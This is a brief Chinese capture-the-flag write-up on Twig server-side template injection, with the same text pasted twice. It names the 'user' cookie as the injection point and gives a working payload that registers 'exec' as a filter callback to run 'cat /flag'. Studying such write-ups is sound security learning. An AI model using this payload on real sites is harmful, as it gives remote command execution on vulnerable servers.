0x00 知识点
Twig模板注入
链接:
0x01 解题
测试一下发现*wig模板注入
找注入点:
根据提示,cookie中的user是注入点
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};
Twig模板注入
链接:
测试一下发现*wig模板注入
找注入点:
根据提示,cookie中的user是注入点
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};